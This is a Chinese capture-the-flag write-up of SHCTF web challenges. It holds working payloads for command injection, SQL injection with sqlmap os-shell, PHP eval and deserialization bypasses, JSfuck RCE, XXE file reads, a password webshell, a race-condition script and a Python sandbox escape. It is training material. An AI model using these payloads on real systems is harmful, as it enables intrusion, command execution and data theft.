SHCTF 个人题解

ez-ping#

域名测试系统中真的只能测试域名吗？我不相信！

经典ping网站，&既是shell的命令分隔符，又是url的get参数分割符，使用&拼接命令：127.0.0.1/&nl /fla?即可。

上古遗迹档案馆#

你咋直接攻击我啊？渗透测试里不是这样的啊！你应该先向我发送一个数据确认我是什么类型的题目，然后通过不断测试来找到我的漏洞点，提升测试成功率，最后在特殊漏洞点给我发送点特殊数据，我就会给你我的正确flag，最后你才能得分啊。

sql注入，但是有点坑人了，直接sqlmap就能得到flag，位于archive_db.secret_vault中的secret_key，但出题人本意应该不是直接读，看接下来的过程：

直接sqlmap：

1
›  sqlmap -u 'http://challenge.shc.tf:31636/?id=2' --batch --dbs
2
        ___
3
       __H__
4
 ___ ___[.]_____ ___ ___  {1.10#pip}
5
|_ -| . [(]     | .'| . |
6
|___|_  [']_|_|_|__,|  _|
7
      |_|V...       |_|   https://sqlmap.org
8

9
available databases [6]:
10
[*] archive_db
11
[*] ctftraining
12
[*] information_schema
13
[*] mysql
14
[*] performance_schema
15
[*] test
16

17
›  # 存在可疑数据库ctftraining
18
›  sqlmap -u 'http://challenge.shc.tf:31636/?id=2' --batch -D ctftraining --tables
19
        ___
20
       __H__
21
 ___ ___[']_____ ___ ___  {1.10#pip}
22
|_ -| . [']     | .'| . |
23
|___|_  [,]_|_|_|__,|  _|
24
      |_|V...       |_|   https://sqlmap.org
25

26
Database: ctftraining
27
[3 tables]
28
+------------+
29
| FLAG_TABLE |
30
| news       |
31
| users      |
32
+------------+
33

34
›  # 爆表发现没有内容
35
›  sqlmap -u 'http://challenge.shc.tf:31636/?id=2' --batch -D ctftraining -T FLAG_TABLE --dump
36
        ___
37
       __H__
38
 ___ ___[']_____ ___ ___  {1.10#pip}
39
|_ -| . [)]     | .'| . |
40
|___|_  ["]_|_|_|__,|  _|
41
      |_|V...       |_|   https://sqlmap.org
42

43
Database: ctftraining
44
Table: FLAG_TABLE
45
[0 entries]
46
+-------------+
47
| FLAG_COLUMN |
48
+-------------+
49
+-------------+
50

51
›  # news里还在骗你
52
›  sqlmap -u 'http://challenge.shc.tf:31636/?id=2' --batch -D ctftraining -T news --dump
53
        ___
54
       __H__
55
 ___ ___[.]_____ ___ ___  {1.10#pip}
56
|_ -| . [)]     | .'| . |
57
|___|_  [']_|_|_|__,|  _|
58
      |_|V...       |_|   https://sqlmap.org
59

60
Database: ctftraining
61
Table: news
62
[4 entries]
63
+----+-------+------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
64
| id | title | time       | content                                                                                                                                                                                                                                                                                    |
65
+----+-------+------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
66
| 1  | dog   | 1600763195 | The domestic dog (Canis lupus familiaris when considered a subspecies of the wolf or Canis familiaris when considered a distinct species)[4] is a member of the genus Canis (canines), which forms part of the wolf-like canids,[5] and is the most widely abundant terrestrial carnivore. |
67
| 2  | cat   | 1600763196 | The cat or domestic cat (Felis catus) is a small carnivorous mammal.[1][2] It is the only domesticated species in the family Felidae.[4] The cat is either a house cat, kept as a pet, or a feral cat, freely ranging and avoiding human contact.                                          |
68
| 3  | bird  | 1600763196 | Birds, also known as Aves, are a group of endothermic vertebrates, characterised by feathers, toothless beaked jaws, the laying of hard-shelled eggs, a high metabolic rate, a four-chambered heart, and a strong yet lightweight skeleton.                                                |
69
| 4  | flag  | 1600763196 | Flag is in the database but not here.                                                                                                                                                                                                                                                      |
70
+----+-------+------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

接下来尝试用sqlmap取得shell：

1
›  sqlmap -u 'http://challenge.shc.tf:31636/?id=2' --batch --os-shell
2
os-shell> ls /
3
bin
4
dev
5
docker-entrypoint.sh
6
docker-init
7
etc
8
flag.sh
9
home
10
lib
11
media
12
mnt
13
opt
14
proc
15
root
16
run
17
sbin
18
srv
19
sys
20
tmp
21
usr
22
var

能得到shell，在根目录发现flag.sh：

1
#!/bin/bash
2

3
if [[ -z $FLAG_COLUMN ]]; then
4
  FLAG_COLUMN="flag"
5
fi
6

7
if [[ -z $FLAG_TABLE ]]; then
8
  FLAG_TABLE="flag"
9
fi
10

11
# 修改数据库中的 FLAG
12
mysql -e "USE ctftraining;ALTER TABLE FLAG_TABLE CHANGE FLAG_COLUMN $FLAG_COLUMN CHAR(128) NOT NULL DEFAULT 'not_flag';ALTER TABLE FLAG_TABLE RENAME $FLAG_TABLE;INSERT $FLAG_TABLE VALUES('$FLAG');" -uroot -proot
13

14
export FLAG=not_flag
15
FLAG=not_flag
16

17
rm -f /flag.sh

这段代码显然有问题，故意的还是不小心的，ALTER TABLE FLAG_TABLE CHANGE FLAG_COLUMN这里根本不能正确插入flag，而且文件也没删掉，接着去看docker-entrypoint.sh：

1
#!/bin/sh
2
set -e
3

4
if [ "$A1CTF_FLAG" ]; then
5
    INSERT_FLAG="$A1CTF_FLAG"
6
    unset A1CTF_FLAG
7
elif [ "$SHCTF_FLAG" ]; then
8
    INSERT_FLAG="$SHCTF_FLAG"
9
    unset SHCTF_FLAG
10
elif [ "$GZCTF_FLAG" ]; then
11
    INSERT_FLAG="$GZCTF_FLAG"
12
    unset GZCTF_FLAG
13
elif [ "$FLAG" ]; then
14
    INSERT_FLAG="$FLAG"
15
    unset FLAG
16
else
17
    INSERT_FLAG="SHCTF{!!!!_FLAG_ERROR_ASK_ADMIN_!!!!}"
18
fi
19

20
echo "[*] Starting MySQL..."
21
if [ -x /etc/init.d/mysql ]; then
22
  /etc/init.d/mysql start
23
else
24
  mysqld_safe --skip-networking &
25
  sleep 5
26
fi
27

28
echo "[*] Waiting for MySQL..."
29
for i in $(seq 1 30); do
30
  if mysqladmin ping --silent; then break; fi
31
  sleep 1
32
done
33

34
# 设置 root 密码
35
mysql -uroot -e "ALTER USER 'root'@'localhost' IDENTIFIED BY '060520';" || true
36

37
echo "[*] Init Database..."
38
# 导入 SQL 结构
39
mysql -uroot -p060520 < /docker-init/db.sql
40

41
# 【重要】将环境变量中的真正的 Flag 写入数据库
42
echo "[*] Inserting Flag..."
43
mysql -uroot -p060520 archive_db -e "UPDATE secret_vault SET secret_key='$INSERT_FLAG' WHERE id=1;"
44

45
# 启动 PHP 和 Nginx
46
echo "[*] Starting Services..."
47
php-fpm -D || true
48
nginx -g 'daemon off;'

这里才看到真正的flag插入语句：mysql -uroot -p060520 archive_db -e "UPDATE secret_vault SET secret_key='$INSERT_FLAG' WHERE id=1;"，由此得到flag的正确位置。

kill_king#

提升自己，杀死King，或者,,,做点别的???

好玩的小游戏。

在页面加载之前按F12就可以打开开发者工具，在源码里看到游戏胜利后会向check.php发送post：result=win，手动发送，得到：

1
<?php
2
// 国王并没用直接爆出flag，而是出现了别的东西？？？
3
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
4
    if (isset($_POST['result']) && $_POST['result'] === 'win') {
5
        highlight_file(__FILE__);
6
        if(isset($_GET['who']) && isset($_GET['are']) && isset($_GET['you'])){
7
            $who = (String)$_GET['who'];
8
            $are = (String)$_GET['are'];
9
            $you = (String)$_GET['you'];
10

11
            if(is_numeric($who) && is_numeric($are)){
12
                if(preg_match('/^\W+$/', $you)){
13
                    $code =  eval("return $who$you$are;");
14
                    echo "$who$you$are = ".$code;
15
                }
16
            }
17
        }
18
    } else {
19
        echo "Invalid result.";
20
    }
21
} else {
22
    echo "No access.";
23
}
24
?>

这里$who和$are必须是数字，$you不能包含字母、数字和下划线，我们使用如下php代码构造payload：

1
<?php
2
echo "who=1&you=|(~" . urlencode(~"system") . ")(~" . urlencode(~"cat /flag") . ")|&are=1";
3
# who=1&you=|(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98)|&are=1

这里使用|按位或拼接数字和函数，能让函数正常运行，且结果也能正常运算。当然，这里用.拼接字符串也行。

calc?js?fuck!#

怎么又是计算器？又是js？fuck！

考点是无字母js rce，也就是JSfuck

1
const express = require('express');
2
const app = express();
3
const port = 5000;
4

5
app.use(express.json());
6

7

8
const WAF = (recipe) => {
9
    const ALLOW_CHARS = /^[012345679!\.\-\+\*\/\(\)\[\]]+$/;
10
    if (ALLOW_CHARS.test(recipe)) {
11
        return true;
12
    }
13
    return false;
14
};
15

16

17
function calc(operator) {
18
    return eval(operator);
19
}
20

21
app.get('/', (req, res) => {
22
    res.sendFile(__dirname + '/index.html');
23
});
24

25

26
app.post('/calc', (req, res) => {
27
    const { expr } = req.body;
28
    console.log(expr);
29
    if(WAF(expr)){
30
        var result = calc(expr);
31
        res.json({ result });
32
    }else{
33
        res.json({"result":"WAF"});
34
    }
35
});
36

37

38
app.listen(port, () => {
39
    console.log(`Server running on port ${port}`);
40
});

使用jsfuck编码process.mainModule.require('child_process').execSync('cat /flag').toString()即可。

Ezphp#

在未来的某一天，人类已经能够进行太阳系内的旅行。小明作为一名宇航员，被赋予了一项任务：探索太阳系中的不同星球。但是，在旅途中，他发现了一个神秘的坐标，此坐标周围的空间似乎被切割为一块块光滑的镜面，折叠堆积在一块，小明在经过这的时候甚至透过舷窗同时看到了自己的后背和右腿以难以理解的角度拼接在一块。与此同时，他发现该折叠空间内部蕴含了一个小型黑洞，他试图往母星发送这一发现，但在此之前，他需要先离开这里…

考点为[[POP链]]+Fast Destruct。

网页源码为：

1
<?php
2

3
highlight_file(__FILE__);
4
error_reporting(0);
5

6
class Sun{
7
    public $sun;
8
    public function __destruct(){
9
        die("Maybe you should fly to the ".$this->sun);
10
    }
11
}
12

13
class Solar{
14
    private $Sun;
15
    public $Mercury;
16
    public $Venus;
17
    public $Earth;
18
    public $Mars;
19
    public $Jupiter;
20
    public $Saturn;
21
    public $Uranus;
22
    public $Neptune;
23
    public function __set($name,$key){
24
        $this->Mars = $key;
25
        $Dyson = $this->Mercury;
26
        $Sphere = $this->Venus;
27
        $Dyson->$Sphere($this->Mars);
28
    }
29
    public function __call($func,$args){
30
        if(!preg_match("/exec|popen|popens|system|shell_exec|assert|eval|print|printf|array_keys|sleep|pack|array_pop|array_filter|highlight_file|show_source|file_put_contents|call_user_func|passthru|curl_exec/i", $args[0])){
31
            $exploar = new $func($args[0]);
32
            $road = $this->Jupiter;
33
            $exploar->$road($this->Saturn);
34
        }
35
        else{
36
            die("Black hole");
37
        }
38
    }
39
}
40

41
class Moon{
42
    public $nearside;
43
    public $farside;
44
    public function __tostring(){
45
        $starship = $this->nearside;
46
        $starship();
47
        return '';
48
    }
49
}
50

51
class Earth{
52
    public $onearth;
53
    public $inearth;
54
    public $outofearth;
55
    public function __invoke(){
56
        $oe = $this->onearth;
57
        $ie = $this->inearth;
58
        $ote = $this->outofearth;
59
        $oe->$ie = $ote;
60
    }
61
}
62

63

64

65
if(isset($_POST['travel'])){
66
    $a = unserialize($_POST['travel']);
67
    throw new Exception("How to Travel?");
68
}

构造pop链如下：

1
<?php
2
class Sun {
3
    public $sun;
4
}
5

6
class Moon {
7
    public $nearside;
8
}
9

10
class Earth {
11
    public $onearth;
12
    public $inearth;
13
    public $outofearth;
14
}
15

16
class Solar {
17
    public $Mercury;
18
    public $Venus;
19
    public $Jupiter;
20
    public $Saturn;
21
}
22

23
// Sun::__desturct ->
24
// Moon::__toString ->
25
// Earth::__invoke ->
26
// Solar::__set($name,$key)
27
//   $key = $this->outofearth
28
// ->
29
// Solar::__call($func,$args)
30
//   $func = $Dyson->$Sphere = $this->Mercury->$this->Venus;
31
//   $args = $this->Mars = $key
32
// ->
33
// $exploar = new $func($args[0]);
34
// $road = $this->Jupiter;
35
// $exploar->$road($this->Saturn);
36

37
$payload = new Sun();
38
$payload->sun = new Moon();
39
$payload->sun->nearside = new Earth();
40
$payload->sun->nearside->onearth = new Solar();
41
$payload->sun->nearside->inearth = "none";
42
$payload->sun->nearside->outofearth = "readfile";
43
$payload->sun->nearside->onearth->Mercury = new Solar();
44
$payload->sun->nearside->onearth->Venus = "ReflectionFunction";
45
$payload->sun->nearside->onearth->Mercury->Jupiter = "invoke";
46
$payload->sun->nearside->onearth->Mercury->Saturn = "/etc/passwd";
47

48

49
echo serialize($payload);
50
?>

直接提交序列化后的payload是不会有任何输出的，这就是一个非常经典的环境问题。

通过wapplayzer能看到，服务器的后端为Nginx，

Nginx+PHP-FPM对Fatal Error或Uncaught Exception有特殊的处理机制：

代码末尾有一句 throw new Exception(...)，一般的处理逻辑为：unserialize -> 抛出异常 -> 脚本中止 (HTTP 500) -> 执行对象销毁 (__destruct) -> 输出结果。
但在 Nginx 环境下，当 PHP 抛出未捕获的异常导致 HTTP 状态码变为 500 时，Nginx 可能会丢弃 PHP 进程在缓冲区中输出的内容（包括 readfile 或 Black hole），直接显示 Nginx 默认的错误页或空白页。

所以我们需要使用 Fast Destruct（快速析构/GC 提前回收） 技巧。
我们要强迫 Sun 对象在 unserialize 函数执行期间就销毁，而不是等到脚本结束（即在 throw new Exception 之前）。这样，Sun::__destruct 中的 die() 会被执行，脚本会正常结束（HTTP 200），从而避开后面的异常抛出。

所以我们修改一下payload：

1
echo 'a:2:{i:0;' . serialize($payload) . 'i:0;i:1;}';

使用数组包裹paylaod为第0号索引，之后再添加任意元素索引也为0

反序列化数组时，先解析第0个元素为对象，然后解析第二个元素，发现索引也是0，于是覆盖掉刚才的对象。被覆盖的对象引用计数归零，提前GC，于是立马__destruct，此时unserialize还没结束，使得在throw new Exception之前就能执行代码。

05_em_v_CFK#

继某两所大学校内餐厅被黑后，终于考上大学的小明也想“逝世”，但是他遇到了一些困难于是请求你的帮助。他给你留了一个webshell，并给你的一条线索，去帮他完成吧。

~~请联系CTF生活，写一篇文章，谈谈你的认识与思考。~~ ~~要求:(1)自拟题目;(2)不少于 800字。~~

查看源码发现5bvE5YvX5Ylt5YdT5Yvdp2uyoTjhpTujYPQyhXoxhVcmnT935L+P5cJjM2I05oPC5cvB55dR5Mlw6LTK54zc5MPa，是ROT13映射的base64加密，解密得到： 我上传了个shell.php, 带上show参数get小明的圣遗物吧。

题目纯纯恶心人，最后在/uploads/shell.php?show=1下找到php：

1
<?php
2

3
if (isset($_GET['show'])) {
4
    highlight_file(__FILE__);
5
}
6

7
$pass = 'c4d038b4bed09fdb1471ef51ec3a32cd';
8

9
if (isset($_POST['key']) && md5($_POST['key']) === $pass) {
10
    if (isset($_POST['cmd'])) {
11
        system($_POST['cmd']);
12
    } elseif (isset($_POST['code'])) {
13
        eval($_POST['code']);
14
    }
15
} else {
16
    http_response_code(404);
17
}

爆破出key为114514，越来越想骂出题人了。

得到shell后在网页运行目录发现被混淆了的php:connect.php，看看index.php的源码：

1
<?php
2
include 'connect.php';
3

4
$my_money = 3.00;
5
$msg = "";
6
$target_id = 0;
7

8
if (isset($_POST['buy']) && isset($_POST['item_id'])) {
9
    $target_id = (int)$_POST['item_id'];
10

11
    if ($target_id > 0) {
12
        try {
13
            $stmt = $pdo->prepare("CALL buy_item(?, ?)");
14
            $stmt->execute([$target_id, $my_money]);
15
            $res = $stmt->fetch();
16
            $msg = $res['final_message'];
17
            $my_money -= $res['current_price'];
18
        } catch (Exception $e) {
19
            $msg = "Transaction Error: " . $e->getMessage();
20
        }
21
    } else {
22
        $msg = "Invalid item selected.";
23
    }
24
} else {
25
    try {
26
        $stmt = $pdo->query("SELECT id, name, price FROM goods ORDER BY id ASC");
27
        if ($stmt === false) {
28
            exit;
29
        }
30
        $goods_list = $stmt->fetchAll();
31
    } catch (Exception $e) {
32
        die("Error fetching goods list.");
33
    }
34
}

正好shell.php能直接接收php代码，我们直接仿照源码去买flag就行了：

1
key=114514
2
&code=include '../connect.php';$stmt=$pdo->prepare('CALL buy_item(3,100)');$stmt->execute();var_dump($stmt->fetch());

Go#

我们开发了一个由 Go 语言编写的安全验证系统。防火墙（WAF）发誓它已经拦截了所有的 admin 角色请求。

打开网页只得到一个json:

1
{
2
  "username": "guest",
3
  "role": "guest",
4
  "message": "Access denied. Only role='admin' can view the flag."
5
}

看题目提示，猜向页面post传json：

1
{
2
  "role": "admin"
3
}

果然得到：

1
{
2
    "error": "🚫 WAF Security Alert: 'admin' value is strictly forbidden in 'role' field!"
3
}

利用Go的json.Unmarshal在映射json到go结构体时，默认不区分键名大小写，构造如下payload即可得到flag：

1
{
2
    "Role": "admin"
3
}

Mini Blog#

完全安全的博客系统。

[[XXE]]

博客发布页，查看发布文章/create页面的源码，发现js代码会将我们的内容转为xml上传，随便写点，上传抓包，果然发现xml：

1
<?xml version="1.0" encoding="UTF-8"?>
2
<post>
3
    <title>123</title>
4
    <content>123</content>
5
</post>

直接改为xxe的payload即可得到flag。

1
<?xml version="1.0" encoding="UTF-8"?>
2
<!DOCTYPE note [
3
  <!ENTITY xxe SYSTEM "file:///flag">
4
]>
5
<post>
6
  <title>&xxe;</title>
7
  <content>XXE</content>
8
</post>

ez_race#

狠狠赚钱

考点就是Race Condition,[[条件竞争]]

下载得到网页的源码，找到bank/views.py>WithdrawView>form_valid这里，也就是代码的第25行：

1
    def form_valid(self, form):
2
        amount = form.cleaned_data["amount"]
3
        with transaction.atomic():
4
            time.sleep(1.0)
5
            user = models.User.objects.get(pk=self.request.user.pk)
6
            if user.money >= amount:
7
                user.money = F('money') - amount
8
                user.save()
9
                models.WithdrawLog.objects.create(user=user, amount=amount)
10

11
        user.refresh_from_db()
12
        if user.money < 0:
13
            return HttpResponse(os.environ.get("FLAG", "flag{flag_test}"))
14

15
        return redirect(self.get_success_url())

这里的time.sleep(1.0)明显是出题人故意留给我们的切入点，同时快速重复发包，让两次线程都查询到if user.money >= amount成立，发生两次扣款，直到把钱扣成负的。

我们直接用测试帐号登录，10块钱的新手红包就不领了，在充值界面发包拦截得到cookie内的sessionid、csrftoken，和请求体里的csrfmiddlewaretoken，这个字段是每次进入充值页面时服务器生成在表单里的隐藏字段，但是时效性过长，能够被多次使用，所以我们只获取一次就够了，编写脚本发包：

1
import requests
2
import threading
3
import re
4

5
URL: str = "http://challenge.shc.tf:31301"
6

7
COOKIES: dict[str, str] = {
8
    "sessionid": "5s8jbubxrjamavcvy53r9dfhgrqn2uvb",
9
    "csrftoken": "ta6UqD8PHRlRfYgmKkD2upwKGBzvKmgt"
10
}
11

12
DATA: dict[str, str] = {
13
    "amount": 10,
14
    "csrfmiddlewaretoken": "1jZpWo6xPMHslmXCQCPquxAFkgarj5gckjV9cR4cmtS9qa3OqMiiOMWfQHzMThmv"
15
}
16

17
def attack(debug=False):
18
    response = requests.post(URL+"/withdraw",
19
        data = DATA,
20
        cookies = COOKIES,
21
    )
22
    html = response.text
23
    print(f"[+] Status: {response.status_code}, Response Length: {len(html)}")
24
    if "SHCTF{" in response.text: print(f"[!] Found flag: {re.search(r'SHCTF\{.*\}', response.text)[0]}")
25
    if debug: print(f"[+] Response: {html}")
26

27
t1 = threading.Thread(target=attack)
28
t2 = threading.Thread(target=attack)
29

30
t1.start()
31
t2.start()
32

33
t1.join()
34
t2.join()
35

36
# attack(debug=True)

并行太多可能导致服务器返回502，两个线程足够了。这样我们就能倒欠服务器10块，得到flag。再去把新手礼包领了，余额就好看了。

Eazy_Pyrunner#

任何人都可以运行自己的 Python 程序！不过大嗨客就算了，还有运行的程序必须是我喜欢的。

题目上写的是中等难度，题本身难度确实不高，但是黑盒，真的很折磨人，这里对着打进去后找到的源码来讲比较清晰一点：

1
from flask import Flask, render_template_string, request, jsonify
2
import subprocess
3
import tempfile
4
import os
5
import sys
6

7
app = Flask(__name__)
8

9
@app.route('/')
10
def index():
11
    file_name = request.args.get('file', 'pages/index.html')
12
    try:
13
        with open(file_name, 'r', encoding='utf-8') as f:
14
            content = f.read()
15
    except Exception as e:
16
        with open('pages/index.html', 'r', encoding='utf-8') as f:
17
            content = f.read()
18

19
    return render_template_string(content)
20

21
def waf(code):
22
    blacklisted_keywords = ['import', 'open', 'read', 'write', 'exec', 'eval', '__', 'os', 'sys', 'subprocess', 'run', 'flag', "'", '"']
23
    for keyword in blacklisted_keywords:
24
        if keyword in code:
25
            return False
26
    return True
27

28
@app.route('/execute', methods=['POST'])
29
def execute_code():
30
    code = request.json.get('code', '')
31

32
    if not code:
33
        return jsonify({'error': '请输入Python代码'})
34

35
    if not waf(code):
36
        return jsonify({'error': 'Hacker!'})
37

38
    try:
39
        with tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False) as f:
40
            f.write(f"""import sys
41

42
sys.modules['os'] = 'not allowed'
43

44
def is_my_love_event(event_name):
45
    return event_name.startswith("Nothing is my love but you.")
46

47
def my_audit_hook(event_name, arg):
48
    if len(event_name) > 0:
49
        raise RuntimeError("Too long event name!")
50
    if len(arg) > 0:
51
        raise RuntimeError("Too long arg!")
52
    if not is_my_love_event(event_name):
53
        raise RuntimeError("Hacker out!")
54

55
__import__('sys').addaudithook(my_audit_hook)
56

57
{code}""")
58
            temp_file_name = f.name
59

60
        result = subprocess.run(
61
            [sys.executable, temp_file_name],
62
            capture_output=True,
63
            text=True,
64
            timeout=10
65
        )
66

67
        os.unlink(temp_file_name)
68

69
        return jsonify({
70
            'stdout': result.stdout,
71
            'stderr': result.stderr
72
        })
73

74
    except subprocess.TimeoutExpired:
75
        return jsonify({'error': '代码执行超时（超过10秒）'})
76
    except Exception as e:
77
        return jsonify({'error': f'执行出错: {str(e)}'})
78
    finally:
79
        if os.path.exists(temp_file_name):
80
            os.unlink(temp_file_name)
81

82
if __name__ == '__main__':
83
    app.run(debug=True)

waf里能看到单双引号都被过滤了，所以构造字符串我们使用chr(i)+chr(j)拼接绕过，其他的模块名可以直接全角字符绕过。

盲打的时候就慢慢试出来waf了，先看看有什么模块

1
print(ｓｙｓ.modules)

1
{
2
    'sys': <module 'sys' (built-in)>,
3
    'builtins': <module 'builtins' (built-in)>,
4
    '_frozen_importlib': <module '_frozen_importlib' (frozen)>,
5
    '_imp': <module '_imp' (built-in)>,
6
    '_thread': <module '_thread' (built-in)>,
7
    '_warnings': <module '_warnings' (built-in)>,
8
    '_weakref': <module '_weakref' (built-in)>,
9
    '_io': <module '_io' (built-in)>,
10
    'marshal': <module 'marshal' (built-in)>,
11
    'posix': <module 'posix' (built-in)>,
12
    '_frozen_importlib_external': <module '_frozen_importlib_external' (frozen)>,
13
    'time': <module 'time' (built-in)>,
14
    'zipimport': <module 'zipimport' (frozen)>,
15
    '_codecs': <module '_codecs' (built-in)>,
16
    'codecs': <module 'codecs' (frozen)>,
17
    'encodings.aliases': <module 'encodings.aliases' from '/usr/local/lib/python3.12/encodings/aliases.py'>,
18
    'encodings': <module 'encodings' from '/usr/local/lib/python3.12/encodings/__init__.py'>,
19
    'encodings.utf_8': <module 'encodings.utf_8' from '/usr/local/lib/python3.12/encodings/utf_8.py'>,
20
    '_signal': <module '_signal' (built-in)>,
21
    '_abc': <module '_abc' (built-in)>,
22
    'abc': <module 'abc' (frozen)>,
23
    'io': <module 'io' (frozen)>,
24
    '__main__': <module '__main__' from '/tmp/tmp7ysmi_p1.py'>,
25
    '_stat': <module '_stat' (built-in)>,
26
    'stat': <module 'stat' (frozen)>,
27
    '_collections_abc': <module '_collections_abc' (frozen)>,
28
    'genericpath': <module 'genericpath' (frozen)>,
29
    'posixpath': <module 'posixpath' (frozen)>,
30
    'os.path': <module 'posixpath' (frozen)>,
31
    'os': 'not allowed',
32
    '_sitebuiltins': <module '_sitebuiltins' (frozen)>,
33
    'site': <module 'site' (frozen)>,
34
    'unicodedata': <module 'unicodedata' from '/usr/local/lib/python3.12/lib-dynload/unicodedata.cpython-312-x86_64-linux-musl.so'>
35
}

可以看到有个posix还是很有用的，不过。。。

1
M = ｓｙｓ.modules
2
P = M[chr(112)+chr(111)+chr(115)+chr(105)+chr(120)] # posix
3

4
try: P.listdir()
5
except Exception as e: print(e)

得到：

1
Too long event name!

这提示也太坑人了，对不上脑洞的我只好去查一次__main__：

1
M = ｓｙｓ.modules
2
B = M[chr(98)+chr(117)+chr(105)+chr(108)+chr(116)+chr(105)+chr(110)+chr(115)] # 'builtins'
3
G = B.getattr
4

5
MainName = chr(95)+chr(95)+chr(109)+chr(97)+chr(105)+chr(110)+chr(95)+chr(95) # '__main__'
6
DictName = chr(95)+chr(95)+chr(100)+chr(105)+chr(99)+chr(116)+chr(95)+chr(95) # '__dict__'
7

8
MainMod = M[MainName]
9

10
try: print(G(MainMod, DictName))
11
except Exception as e: print(e)

得到：

1
{
2
    '__name__': '__main__',
3
    '__doc__': None,
4
    '__package__': None,
5
    '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7f177112ab40>,
6
    '__spec__': None,
7
    '__annotations__': {},
8
    '__builtins__': <module 'builtins' (built-in)>,
9
    '__file__': '/tmp/tmpfxgm71qm.py',
10
    '__cached__': None,
11
    'sys': <module 'sys' (built-in)>,
12
    'is_my_love_event': <function is_my_love_event at 0x7f17713faac0>,
13
    'my_audit_hook': <function my_audit_hook at 0x7f1771165580>,
14
    'M': { ... },
15
    'B': <module 'builtins' (built-in)>,
16
    'G': <built-in function getattr>,
17
    'MainName': '__main__',
18
    'DictName': '__dict__',
19
    'MainMod': <module '__main__' from '/tmp/tmpfxgm71qm.py'>
20
}

这里就能看到审计函数is_my_love_event和审计钩子my_audit_hook，不过不看源码谁能猜到，最后还是到处碰壁，同时修改len函数和is_my_love_event就能绕过审计：

1
M = ｓｙｓ.modules
2
B = M[chr(98)+chr(117)+chr(105)+chr(108)+chr(116)+chr(105)+chr(110)+chr(115)]
3
G = B.getattr
4
S = B.setattr
5

6
MainName = chr(95)+chr(95)+chr(109)+chr(97)+chr(105)+chr(110)+chr(95)+chr(95)
7
MainMod = M[MainName]
8

9
LenName = chr(108)+chr(101)+chr(110)　# len
10
S(MainMod, LenName, lambda x: 0)
11

12
CheckName = chr(105)+chr(115)+chr(95)+chr(109)+chr(121)+chr(95)+chr(108)+chr(111)+chr(118)+chr(101)+chr(95)+chr(101)+chr(118)+chr(101)+chr(110)+chr(116) # is_my_love_event
13
S(MainMod, CheckName, lambda x: True)
14

15
P = M[chr(112)+chr(111)+chr(115)+chr(105)+chr(120)] # posix
16

17
try: print(P.listdir(chr(47))) # /
18
except Exception as e: print(e)

最后也是成功读取到根目录：

1
['bin', 'dev', 'etc', 'home', 'lib', 'media', 'mnt', 'opt', 'proc', 'root', 'run', 'sbin', 'srv', 'sys', 'tmp', 'usr', 'var', 'flag', 'read_flag', 'app']

posix#

/flag直接读是没有权限的，因为posix没有popen，所以只能用system写出/read_flag > /tmp/flag，再用posix.read(posix.open("/tmp/flag", 0), 100)读文件：

1
M = ｓｙｓ.modules
2
B = M[chr(98)+chr(117)+chr(105)+chr(108)+chr(116)+chr(105)+chr(110)+chr(115)]
3
G = B.getattr
4
S = B.setattr
5

6
MainName = chr(95)+chr(95)+chr(109)+chr(97)+chr(105)+chr(110)+chr(95)+chr(95)
7
MainMod = M[MainName]
8

9
LenName = chr(108)+chr(101)+chr(110)
10
S(MainMod, LenName, lambda x: 0)
11

12
CheckName = chr(105)+chr(115)+chr(95)+chr(109)+chr(121)+chr(95)+chr(108)+chr(111)+chr(118)+chr(101)+chr(95)+chr(101)+chr(118)+chr(101)+chr(110)+chr(116)
13
S(MainMod, CheckName, lambda x: True)
14

15
P = M[chr(112)+chr(111)+chr(115)+chr(105)+chr(120)]
16
FalseF = chr(47)+chr(116)+chr(109)+chr(112)+chr(47)+chr(102)+chr(108)+chr(97)+chr(103)
17
CmdStr = chr(47)+chr(114)+chr(101)+chr(97)+chr(100)+chr(95)+chr(102)+chr(108)+chr(97)+chr(103)+chr(32)+chr(62)+chr(32) + FalseF
18

19
try:
20
    P.ｓｙｓｔｅｍ(CmdStr)
21
    fd = P.ｏｐｅｎ(FalseF, 0)
22
    print(P.ｒｅａｄ(fd, 20000))
23
except Exception as e: print(e)

os#

之前也看到，os的被赋值为了not allowed，我们想要得到模块os，就要先删除这个字符串os，再重新导入：

1
M = ｓｙｓ.modules
2
B = M[chr(98)+chr(117)+chr(105)+chr(108)+chr(116)+chr(105)+chr(110)+chr(115)]
3
G = B.getattr
4
S = B.setattr
5
MainMod = M[chr(95)+chr(95)+chr(109)+chr(97)+chr(105)+chr(110)+chr(95)+chr(95)]
6
S(MainMod, chr(108)+chr(101)+chr(110), lambda x: 0)
7
S(MainMod, chr(105)+chr(115)+chr(95)+chr(109)+chr(121)+chr(95)+chr(108)+chr(111)+chr(118)+chr(101)+chr(95)+chr(101)+chr(118)+chr(101)+chr(110)+chr(116), lambda x: True)
8

9
M.pop(chr(111)+chr(115))
10
ImpName = chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95) # __import__
11
ImpFunc = G(B, ImpName)
12
OS = ImpFunc(chr(111)+chr(115))
13

14
print(OS.ｐｏｐｅｎ(chr(108)+chr(115)+chr(32)+chr(47)).ｒｅａｄ()) # ls /

Site#

除了直接弹出，我们知道site模块在初始化时自动导入，它内部导入了os。即使sys.modules['os']被修改了，site模块因为加载更早，它内部的os仍是纯净的：

1
M = ｓｙｓ.modules
2
B = M[chr(98)+chr(117)+chr(105)+chr(108)+chr(116)+chr(105)+chr(110)+chr(115)]
3
G = B.getattr
4
S = B.setattr
5
MainMod = M[chr(95)+chr(95)+chr(109)+chr(97)+chr(105)+chr(110)+chr(95)+chr(95)]
6
S(MainMod, chr(108)+chr(101)+chr(110), lambda x: 0)
7
S(MainMod, chr(105)+chr(115)+chr(95)+chr(109)+chr(121)+chr(95)+chr(108)+chr(111)+chr(118)+chr(101)+chr(95)+chr(101)+chr(118)+chr(101)+chr(110)+chr(116), lambda x: True)
8

9
SiteMod = M[chr(115)+chr(105)+chr(116)+chr(101)]
10
OS = G(SiteMod, chr(111)+chr(115))
11
M[chr(111)+chr(115)] = OS
12

13
